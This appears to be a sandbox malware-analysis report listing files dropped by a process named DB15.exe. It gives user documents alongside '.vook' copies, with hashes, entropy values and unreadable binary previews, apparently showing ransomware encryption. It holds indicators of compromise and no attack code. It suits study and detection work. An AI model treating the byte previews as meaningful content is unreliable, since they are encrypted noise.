                                                                                                                                                                                                                                      Preview:NEBFQz.........0[...-rv9.n.P..cM8..Da.VS>....@.....e8.]..I..;.'5.....r....'......j.xnl3.R'..!....p..q^'TE/>h...+.a.e....<...x..3...a.J.?.....~.,....QC.^f.X......6Bv@...aO=O......zJ.zkZ}.&..}.gp.....". }....IB.a............).j..'...:z=.D..Q......#....{#~F..U8.e.....t.9w!b9t^.....v.L.9nn|....R>...%.sqM.~....}.s..y>..[.u/.../W."..9x..5..p...k.7.1Q...YP...........y.... .wO8-.N[.hN.v..S..p-.8.K..x..[.V.:.{.af.E{<-.U."k.....A.Pq.IZ.(.......Vv.U,t@..Z.z......:..P...H7..:.......,..(..+Gq.wP.C..e5._..x\.%#3x..S... .R.u(m,...."..+'s;.W.;... n6H...Ag...=8.8.T%J...k%...j..x....3%..J..|.7....,Oe.A...4..U[&i.]I..Q;.. }..}.`.@.g6.%f9Q+j.......<.I..P..Q$g........2........|....U...P.3....)..._...i.3'/.P.m.@.....v...b..#|J..N..mG...C..u.;..m.i...Vs2..Uv%..NZFt.@`.S..e......8s.....;...X.qo.(%:.o.5!.X..x.fz:@..U{.u/w'..H...(..7f..5T^U)rx.tE..O.Y~.....)...Se2._L......8.j:.P......X......\_K...:....nG..6:qPg@T..E.M.Z.5...C.r.~..1>K.dN.0..WE..W..2.v.sG.3\....

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\NVWZAPQSQL.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.846274411331338
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Fh71C4SDd9hNfeFldCBjgpv3NR7ApGOlBXVtyu/upjamOGrFemJ8+4n09GfFtiTW:Fh71pSDlNAdDV7ApLZr2p2mOGrFeMv8d
                                                                                                                                                                                                                                      MD5:FBF33603851DAF7293BFA73DD4852A44
                                                                                                                                                                                                                                      SHA1:B40DB4F9D3CF30C6BED474EAAFE5D5F1357A11BF
                                                                                                                                                                                                                                      SHA-256:94E74D4A17740583791F3841CEA80614602CB6261857EC5F249E9AF4E2F98C8F
                                                                                                                                                                                                                                      SHA-512:538054F8331BA114DB45DC9BC1646A9AC3B1026D639ADBB2D0E6013316A7E39C35B5B74B39439B37C72BBDC2EB28E66FC8A7FB85225ACD59E34C9F389B491215
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.YD...4..N.ia..?...NN...@..l.T.!..&.........].(..cZ.bF%.`.!..i.`.X~n....b;.$'...V*.B...%R...4...........{....3.%.";4t.{C.ne.Pt.$._.i..Z..,..+...\m...p.....b..HA.....S././...Ur.&2...5K^%.i...|R.w.....4....I'.&.g..%M......k........I......YiP..u.<...T.Sb,*......^.@.X,...v......;...z..5U. .a.k%..i|.VBm.)..l..].6.)4.tQ1.$..1....i.Gvz].*N.&.c.)..n.._.4D7...P...6.{.l.....X..z.(.,....xg.b..PHz6.9.h......i..7.XY..t.5.......A(-.O....^.7{....]P..1Q5..].y@.kJ.......i._...`+l0H.!.w.z.........D./,..%c..M...9.......d.6.X.G.~c..U.uL...].....y&..O..J....G.p.....ML.4=...S..$X^`.>.V.Sz.py"...K......y.=...1u..H. .4..k..S.z$%... ..."....ex...vu...8^.{_...{B. .......n&.r=1Y..&!..;.W..=.E.F."U..d...x..v..hk.R..h]A.ox.;.c]G2.....F)h^..5>jrzK.].I.Z.z.......s{.kW.0.....I..m.:..0.....0h..Q..k2y..k'/.<..../d#w..E..x...Z.h....`@..i...x~..x!..4.mH.J}.Si.(........x..4B..>.dU[zV..A....V..B..=. ..vCf....s.....Ce.{`J....PB..?.O2...>R.3...8}.o..=.dn..

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\NVWZAPQSQL.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.846274411331338
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:Fh71C4SDd9hNfeFldCBjgpv3NR7ApGOlBXVtyu/upjamOGrFemJ8+4n09GfFtiTW:Fh71pSDlNAdDV7ApLZr2p2mOGrFeMv8d
                                                                                                                                                                                                                                      MD5:FBF33603851DAF7293BFA73DD4852A44
                                                                                                                                                                                                                                      SHA1:B40DB4F9D3CF30C6BED474EAAFE5D5F1357A11BF
                                                                                                                                                                                                                                      SHA-256:94E74D4A17740583791F3841CEA80614602CB6261857EC5F249E9AF4E2F98C8F
                                                                                                                                                                                                                                      SHA-512:538054F8331BA114DB45DC9BC1646A9AC3B1026D639ADBB2D0E6013316A7E39C35B5B74B39439B37C72BBDC2EB28E66FC8A7FB85225ACD59E34C9F389B491215
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NVWZA.YD...4..N.ia..?...NN...@..l.T.!..&.........].(..cZ.bF%.`.!..i.`.X~n....b;.$'...V*.B...%R...4...........{....3.%.";4t.{C.ne.Pt.$._.i..Z..,..+...\m...p.....b..HA.....S././...Ur.&2...5K^%.i...|R.w.....4....I'.&.g..%M......k........I......YiP..u.<...T.Sb,*......^.@.X,...v......;...z..5U. .a.k%..i|.VBm.)..l..].6.)4.tQ1.$..1....i.Gvz].*N.&.c.)..n.._.4D7...P...6.{.l.....X..z.(.,....xg.b..PHz6.9.h......i..7.XY..t.5.......A(-.O....^.7{....]P..1Q5..].y@.kJ.......i._...`+l0H.!.w.z.........D./,..%c..M...9.......d.6.X.G.~c..U.uL...].....y&..O..J....G.p.....ML.4=...S..$X^`.>.V.Sz.py"...K......y.=...1u..H. .4..k..S.z$%... ..."....ex...vu...8^.{_...{B. .......n&.r=1Y..&!..;.W..=.E.F."U..d...x..v..hk.R..h]A.ox.;.c]G2.....F)h^..5>jrzK.].I.Z.z.......s{.kW.0.....I..m.:..0.....0h..Q..k2y..k'/.<..../d#w..E..x...Z.h....`@..i...x~..x!..4.mH.J}.Si.(........x..4B..>.dU[zV..A....V..B..=. ..vCf....s.....Ce.{`J....PB..?.O2...>R.3...8}.o..=.dn..

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8347531562124875
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TIDqhXPQD+oJE2FrAvTYuxteoNfZAFWU6VQ039nlxifstZKziTkbD:8DqJCpA7eoNLR1DtBiD
                                                                                                                                                                                                                                      MD5:EBB8FCCED6EB3520FAC51DC3E3D8F968
                                                                                                                                                                                                                                      SHA1:544E0E2D527966144A1D84DB8B17D0961DEA0CE1
                                                                                                                                                                                                                                      SHA-256:8FBB2B28BDCE8DFD18098D03ACFA94D0B83CD6F1AFAC668B76B16DE8AC86713F
                                                                                                                                                                                                                                      SHA-512:B260AE25250E4808236E42AB1746B057C008BB504F8EC5B0503478F24BF7B0A81739AC8845472361EE8B32E85E2DC77D2B9C692DEFC8C7D073BC158D53762143
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCAj...m.`.f6...*s.X.P....=Ak....;v3=.o.m.X(.m.t.p8%......h....w..5.C..~K..a.37.a.4f.+...=.?R.m.T2..:s5.......dE./(..I...m....o.<...w..6m.Aw.B<..|..*.o.~...zF/..y..X#{.^.qPun(p....`......_h.-c.....iN...W.I...w0.>a....R............tu....5..^W.4...{.ue.1.Z.y9..[..B....8.#R.[v...T.U.Z.YS6T.[....[.oh....}2.|....b..(.e.Up..u>..0Rr..SJ.^>L..*..M|..$.7W...A..Z.L.N0.qU...H.o1)>.E5T2....P..j....g}...;W..:...|(...>..G>[(.H...CllDs..#Uqo.......6-...O../\..@F.....b.A..B.-4....pW.....(.m.S.,i.......-k..\ipXr..v.W6.:1..O.09..TAc.n.1y.5r....S.3b..?n.9Y....l.D.......y.&U.t.*..i.Ap(.A.l *.$.G=[....w....+$?.~.P..o=.X..?..Uy..J.j5..X..i#...o..q.r...... ..h....wMS2)x..0.{..G.sPKB.b.....p.._..Q.Q....d(.7~...+..P..u=.F1....J..&}<..f..\{....}.V..\.=......td....... tU..v...Q}.....2YE......V.{H.|.......3.Z8.{.L..,..I.I..b.....V...H..&...11!...U.y*./<a.RW:..=.J.......e3..1.....*.i..y....~.m?....1.....Ma.0.A...nj....C.G...s..0..1....~%..c`m.K.wT-.y*.......c.c3...

                                                                                                                                                                                                                                      C:\Users\user\Documents\MXPXCVPDVN\PWCCAWLGRE.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8347531562124875
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TIDqhXPQD+oJE2FrAvTYuxteoNfZAFWU6VQ039nlxifstZKziTkbD:8DqJCpA7eoNLR1DtBiD
                                                                                                                                                                                                                                      MD5:EBB8FCCED6EB3520FAC51DC3E3D8F968
                                                                                                                                                                                                                                      SHA1:544E0E2D527966144A1D84DB8B17D0961DEA0CE1
                                                                                                                                                                                                                                      SHA-256:8FBB2B28BDCE8DFD18098D03ACFA94D0B83CD6F1AFAC668B76B16DE8AC86713F
                                                                                                                                                                                                                                      SHA-512:B260AE25250E4808236E42AB1746B057C008BB504F8EC5B0503478F24BF7B0A81739AC8845472361EE8B32E85E2DC77D2B9C692DEFC8C7D073BC158D53762143
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PWCCAj...m.`.f6...*s.X.P....=Ak....;v3=.o.m.X(.m.t.p8%......h....w..5.C..~K..a.37.a.4f.+...=.?R.m.T2..:s5.......dE./(..I...m....o.<...w..6m.Aw.B<..|..*.o.~...zF/..y..X#{.^.qPun(p....`......_h.-c.....iN...W.I...w0.>a....R............tu....5..^W.4...{.ue.1.Z.y9..[..B....8.#R.[v...T.U.Z.YS6T.[....[.oh....}2.|....b..(.e.Up..u>..0Rr..SJ.^>L..*..M|..$.7W...A..Z.L.N0.qU...H.o1)>.E5T2....P..j....g}...;W..:...|(...>..G>[(.H...CllDs..#Uqo.......6-...O../\..@F.....b.A..B.-4....pW.....(.m.S.,i.......-k..\ipXr..v.W6.:1..O.09..TAc.n.1y.5r....S.3b..?n.9Y....l.D.......y.&U.t.*..i.Ap(.A.l *.$.G=[....w....+$?.~.P..o=.X..?..Uy..J.j5..X..i#...o..q.r...... ..h....wMS2)x..0.{..G.sPKB.b.....p.._..Q.Q....d(.7~...+..P..u=.F1....J..&}<..f..\{....}.V..\.=......td....... tU..v...Q}.....2YE......V.{H.|.......3.Z8.{.L..,..I.I..b.....V...H..&...11!...U.y*./<a.RW:..=.J.......e3..1.....*.i..y....~.m?....1.....Ma.0.A...nj....C.G...s..0..1....~%..c`m.K.wT-.y*.......c.c3...

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.838920757779038
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:PxnbuqAxBtRK7ntHx7/7G+VGmJfQP2u+6AehpoHXjTEQLbOq1lLl+m3SPiTkbD:Ianhx7/QmJfQdXAAoHzTJvb1NiKiD
                                                                                                                                                                                                                                      MD5:8816FC4E29DAEB5F199E343F4F8CF345
                                                                                                                                                                                                                                      SHA1:BAA982EEB4B1BE7A541DF648195ED3D1EEC5C5DD
                                                                                                                                                                                                                                      SHA-256:377B39B2C8B0324C3A5AF0F2E04CEBBF1470CE55A8BF0D36103F4753470D53D4
                                                                                                                                                                                                                                      SHA-512:D7393786FDA80CA20304AA1E67E3BD133F467D5E4161CBF9BE1FE6896B4D398A33AD55F77B03C27C68459E3E2EA3DBE9D9DD424D06368D86742BAFBB48E867E2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.'.S..S.b..NJ C.9........eV...D..m.....N......@..>...... /...?3.c...T.,r....5.z{..l6Y..Z......W....vHN.O.I.gK..Y,c..k.y."(..!=x.}..>;<.......hp..y.."...i..F]qb.ZhT.c.g^V;.;zM....5an.......{.*..iv=u...2..9.c !..o.....q..$...].1:....a,.e9`.4.5.@.....a,bM.:.../-....5....<.5..q..Z.J....^D...,V.Nu.8jR(...}Y...<A...$..)...tV....s(Y.......{FG..oF......J...........I........h...\.........|ph...9.J]....$......^....FN_..,.bNs.t.M.....!F32..A..I$.g.^.A..b8.....}.U'.j...A....[v-..k.<..f.g...J..iE(;.5a...t.T]...Q......v].Of.ju0\.d..A..&~.>...f..O..E..YTZ,....9.\FE.6^h.CR...B......V..?.;.'.*...b5S...[..T....~.....9B=|..............5....<`..b.....zk..m.......-..u.mq...o1..A.b.o.s.P~....[.............`V........&..+/.&y...{..I......c.}.].v....B.MX.r. ?.T...i.../h..Tp....6...O9.7..o4UI.0.+^.9.".h6.A.@7..$Q.=..2MFY.R..C.,..8..o...FRQW....Z....2&........U....S..F[...e..U.....6QW..x.R8........@,rfVtj._...'.C..2..M`.p}.Ab4...P...<0H....<a^-&....w..rM?0..Wk3....)...i

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.838920757779038
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:PxnbuqAxBtRK7ntHx7/7G+VGmJfQP2u+6AehpoHXjTEQLbOq1lLl+m3SPiTkbD:Ianhx7/QmJfQdXAAoHzTJvb1NiKiD
                                                                                                                                                                                                                                      MD5:8816FC4E29DAEB5F199E343F4F8CF345
                                                                                                                                                                                                                                      SHA1:BAA982EEB4B1BE7A541DF648195ED3D1EEC5C5DD
                                                                                                                                                                                                                                      SHA-256:377B39B2C8B0324C3A5AF0F2E04CEBBF1470CE55A8BF0D36103F4753470D53D4
                                                                                                                                                                                                                                      SHA-512:D7393786FDA80CA20304AA1E67E3BD133F467D5E4161CBF9BE1FE6896B4D398A33AD55F77B03C27C68459E3E2EA3DBE9D9DD424D06368D86742BAFBB48E867E2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.'.S..S.b..NJ C.9........eV...D..m.....N......@..>...... /...?3.c...T.,r....5.z{..l6Y..Z......W....vHN.O.I.gK..Y,c..k.y."(..!=x.}..>;<.......hp..y.."...i..F]qb.ZhT.c.g^V;.;zM....5an.......{.*..iv=u...2..9.c !..o.....q..$...].1:....a,.e9`.4.5.@.....a,bM.:.../-....5....<.5..q..Z.J....^D...,V.Nu.8jR(...}Y...<A...$..)...tV....s(Y.......{FG..oF......J...........I........h...\.........|ph...9.J]....$......^....FN_..,.bNs.t.M.....!F32..A..I$.g.^.A..b8.....}.U'.j...A....[v-..k.<..f.g...J..iE(;.5a...t.T]...Q......v].Of.ju0\.d..A..&~.>...f..O..E..YTZ,....9.\FE.6^h.CR...B......V..?.;.'.*...b5S...[..T....~.....9B=|..............5....<`..b.....zk..m.......-..u.mq...o1..A.b.o.s.P~....[.............`V........&..+/.&y...{..I......c.}.].v....B.MX.r. ?.T...i.../h..Tp....6...O9.7..o4UI.0.+^.9.".h6.A.@7..$Q.=..2MFY.R..C.,..8..o...FRQW....Z....2&........U....S..F[...e..U.....6QW..x.R8........@,rfVtj._...'.C..2..M`.p}.Ab4...P...<0H....<a^-&....w..rM?0..Wk3....)...i

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.856231014658333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:qvzgocNUhHKejw+nvj8RzTMl0ScSYitIhmcjDbygKEcJBYNl4XWAopSEiiTkbD:MEVejFmzwl0bSYitIocrlKbJmnAuSEXq
                                                                                                                                                                                                                                      MD5:38EF9FA4C9D99EA5A7D5EECAFF1EB23A
                                                                                                                                                                                                                                      SHA1:1860AFCF829B610043DC6911AE86CCA5301ED602
                                                                                                                                                                                                                                      SHA-256:D9E4DFD1F4A1DF1B23D74067807BE24941B5816A79980824373FE2B00D8F8F28
                                                                                                                                                                                                                                      SHA-512:CEDEF961B747B4E6F77C34C86EC447B39817E43D5E7EEF61E550EEB11BA39F8A1F3EBCA6B32DEE448F0BB9B4BED0BABEAD183D48DDE944554095914B277D3ABF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ..7"...q_.Rk....}h...+...*.m;r..xi. q...Q...b}]O?..pN....[.A.#t.u&......C.....Y.Wsb.B..l2......$.Z+..'..|.....j..g...@........).Ew.GRw8.......D..U..53.......P..sO.);zYzR^aA.X.I.o...4.B".[.4..#...S}bq.C6...G@A.|d#.<5...dN..J.u..`l..1......_.a...i..P..H...H.....vw...?.{.\.<Pu..V...p..Wi.M..N0..":a....a..d...sX.WY.akG5..U..1{..".G7'.&s..i.h.[..<....0\....>..NG....e.....*<Hh..C.9....}.2?K.."k.[{...n.....Q....TV.."....#v..u...O..=.P.@0.#.kyHGc....B...Fk..?..q..Ay5...K.....9..........8...#...^Z m.........J..W...........)]./.cM..j..T..$....p..c/9...L..LP.....$E....G!s....C..&a5..F...qu.O..Ho.@/.......Y...R.!z...V.lO..E.v..'.v /.2.4.7~5.i..O+.9q.P.m..A.g..2i. .h..M.Q%..k6....L....U...Q....c..6..}.K%.p..Tw......d`W.O.[...`.x.w...R....a.........#*..l...fS..K#<.k.....G...9`R..:8.{..D.....a.M.<.sS......'.y...A&.z..n.g4$v.Cb7.f.)..n)sr.....2...fx..NU.k.........m.`....`f.%...S..xoS.].CV..K.U.....tj..a..C).l.@..y'M..rIx.K....OTv#..5....P].k..._w..9..;.

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.856231014658333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:qvzgocNUhHKejw+nvj8RzTMl0ScSYitIhmcjDbygKEcJBYNl4XWAopSEiiTkbD:MEVejFmzwl0bSYitIocrlKbJmnAuSEXq
                                                                                                                                                                                                                                      MD5:38EF9FA4C9D99EA5A7D5EECAFF1EB23A
                                                                                                                                                                                                                                      SHA1:1860AFCF829B610043DC6911AE86CCA5301ED602
                                                                                                                                                                                                                                      SHA-256:D9E4DFD1F4A1DF1B23D74067807BE24941B5816A79980824373FE2B00D8F8F28
                                                                                                                                                                                                                                      SHA-512:CEDEF961B747B4E6F77C34C86EC447B39817E43D5E7EEF61E550EEB11BA39F8A1F3EBCA6B32DEE448F0BB9B4BED0BABEAD183D48DDE944554095914B277D3ABF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ..7"...q_.Rk....}h...+...*.m;r..xi. q...Q...b}]O?..pN....[.A.#t.u&......C.....Y.Wsb.B..l2......$.Z+..'..|.....j..g...@........).Ew.GRw8.......D..U..53.......P..sO.);zYzR^aA.X.I.o...4.B".[.4..#...S}bq.C6...G@A.|d#.<5...dN..J.u..`l..1......_.a...i..P..H...H.....vw...?.{.\.<Pu..V...p..Wi.M..N0..":a....a..d...sX.WY.akG5..U..1{..".G7'.&s..i.h.[..<....0\....>..NG....e.....*<Hh..C.9....}.2?K.."k.[{...n.....Q....TV.."....#v..u...O..=.P.@0.#.kyHGc....B...Fk..?..q..Ay5...K.....9..........8...#...^Z m.........J..W...........)]./.cM..j..T..$....p..c/9...L..LP.....$E....G!s....C..&a5..F...qu.O..Ho.@/.......Y...R.!z...V.lO..E.v..'.v /.2.4.7~5.i..O+.9q.P.m..A.g..2i. .h..M.Q%..k6....L....U...Q....c..6..}.K%.p..Tw......d`W.O.[...`.x.w...R....a.........#*..l...fS..K#<.k.....G...9`R..:8.{..D.....a.M.<.sS......'.y...A&.z..n.g4$v.Cb7.f.)..n)sr.....2...fx..NU.k.........m.`....`f.%...S..xoS.].CV..K.U.....tj..a..C).l.@..y'M..rIx.K....OTv#..5....P].k..._w..9..;.

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.830390833918716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:ROYlGCyTZkZLD9blLvcSr2NtIn5X5s1obgBIJH2iY0PQ0eG6+hSO20AIZxzh6iTW:ROYlGrFcLDBlLvcU2XI5bgB5iY0PQb20
                                                                                                                                                                                                                                      MD5:0E318B739A6E6D9094166D3608AB47F0
                                                                                                                                                                                                                                      SHA1:B07CB3F2EFB433E43C0BC7209F889697D5E11ABA
                                                                                                                                                                                                                                      SHA-256:8493B34EC0563F4DFFEF17AB698BF3986464E7C7524F000B825CEC3A0A8006E2
                                                                                                                                                                                                                                      SHA-512:310525FB504438521A157742C1D087BD4421BA1610B99A6DF4F35AC907E9E022E757F2F7A0AD14911834243DA04D703DBF7B2D862D21DAB8A6D177DFAF92E5EC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.{O....%X8jD..8...B8.....b.^k.B{.....bjIb.......};.z.%.q......g.!.}.t....~E.Q4.}.6.m......|Z..$.1....S..U.7g!3{.2..5..w..5h...#.x....n....B3p=..,\\mL.C...o..YLo.u:jX.. Rx;.]cH.R.....=ZB...XJH...Vg.C..k..4.>.4..H.u....s.9\._....+..EsN..R.|..r+,..-..l.#G"za..M.a~h4.2,......b}.GI...X.H.3&..d.......+..hf }..........s.....X...g.....#'..U.6..[. "./..g..x..4.....o)..iLH4b....~..2x....^...U.w....-.....0....E.. .MU.....h$..B.5X....k.....&..vB.s..1.l).u4.;..3EA.r..&f....%...\z'....Y.@].u'/.4+.......F....!.( ..?v.E.I..k`.u..<.".}..FP{.Y.......-...'s7K.MO...B..^`M....5.7.J..lnTn..E.V..&.`....ArF-i.A\..?'Nx.L.c..&.eMx..QS..A..xWg..@...W3r8..p..T..G....^...?)=....*)...f!.....>*....8&}...l....?..3FKp%.g.0TX..3.&.........'..u...i...s...e..=O.....Q+...k(.W..vkR..+)..K.e..........?w..:.....| ..J........A...@.8..yZ|..s+.#...h3....0u.3.|...$...%...V.V.*....(f.s............X....@..C....8.z..95p.H.+..B.A..X'z....|.._.Q:.EJE..5j.]..<G....K._#.C.%.U.1.}..1.M....Z

                                                                                                                                                                                                                                      C:\Users\user\Documents\NEBFQQYWPS.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.830390833918716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:ROYlGCyTZkZLD9blLvcSr2NtIn5X5s1obgBIJH2iY0PQ0eG6+hSO20AIZxzh6iTW:ROYlGrFcLDBlLvcU2XI5bgB5iY0PQb20
                                                                                                                                                                                                                                      MD5:0E318B739A6E6D9094166D3608AB47F0
                                                                                                                                                                                                                                      SHA1:B07CB3F2EFB433E43C0BC7209F889697D5E11ABA
                                                                                                                                                                                                                                      SHA-256:8493B34EC0563F4DFFEF17AB698BF3986464E7C7524F000B825CEC3A0A8006E2
                                                                                                                                                                                                                                      SHA-512:310525FB504438521A157742C1D087BD4421BA1610B99A6DF4F35AC907E9E022E757F2F7A0AD14911834243DA04D703DBF7B2D862D21DAB8A6D177DFAF92E5EC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.{O....%X8jD..8...B8.....b.^k.B{.....bjIb.......};.z.%.q......g.!.}.t....~E.Q4.}.6.m......|Z..$.1....S..U.7g!3{.2..5..w..5h...#.x....n....B3p=..,\\mL.C...o..YLo.u:jX.. Rx;.]cH.R.....=ZB...XJH...Vg.C..k..4.>.4..H.u....s.9\._....+..EsN..R.|..r+,..-..l.#G"za..M.a~h4.2,......b}.GI...X.H.3&..d.......+..hf }..........s.....X...g.....#'..U.6..[. "./..g..x..4.....o)..iLH4b....~..2x....^...U.w....-.....0....E.. .MU.....h$..B.5X....k.....&..vB.s..1.l).u4.;..3EA.r..&f....%...\z'....Y.@].u'/.4+.......F....!.( ..?v.E.I..k`.u..<.".}..FP{.Y.......-...'s7K.MO...B..^`M....5.7.J..lnTn..E.V..&.`....ArF-i.A\..?'Nx.L.c..&.eMx..QS..A..xWg..@...W3r8..p..T..G....^...?)=....*)...f!.....>*....8&}...l....?..3FKp%.g.0TX..3.&.........'..u...i...s...e..=O.....Q+...k(.W..vkR..+)..K.e..........?w..:.....| ..J........A...@.8..yZ|..s+.#...h3....0u.3.|...$...%...V.V.*....(f.s............X....@..C....8.z..95p.H.+..B.A..X'z....|.._.Q:.EJE..5j.]..<G....K._#.C.%.U.1.}..1.M....Z

                                                                                                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.866289837104292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:FxyMOeg3CGDI7Psx1dSI5xvLz8Yci082SALFOeFk3ZJspJLJMfZy+XDNiTkbD:FxRyDDoSSI5tQ182t3FoZeTLJQZzYiD
                                                                                                                                                                                                                                      MD5:5C5E35D4BA95B063E6D5D10ADE39D343
                                                                                                                                                                                                                                      SHA1:F2D3C2D03C6E98A3DED116B54DFA924751B841F1
                                                                                                                                                                                                                                      SHA-256:658CEEC5F49415A16617965BE8AC0C7620CEE74DEC577D86B74524248FE8E39B
                                                                                                                                                                                                                                      SHA-512:5C8A57C1F34CC5C78B13192C2118263F5A7E11D3A4174460DBD806285B99AB0D86D65B94FF6DF742B62EEC20EB3091D33A24C2FAB1D0C1FBAC889FF2BF02B6DE
                                                                                                                                                                                                                                      Malicious:false
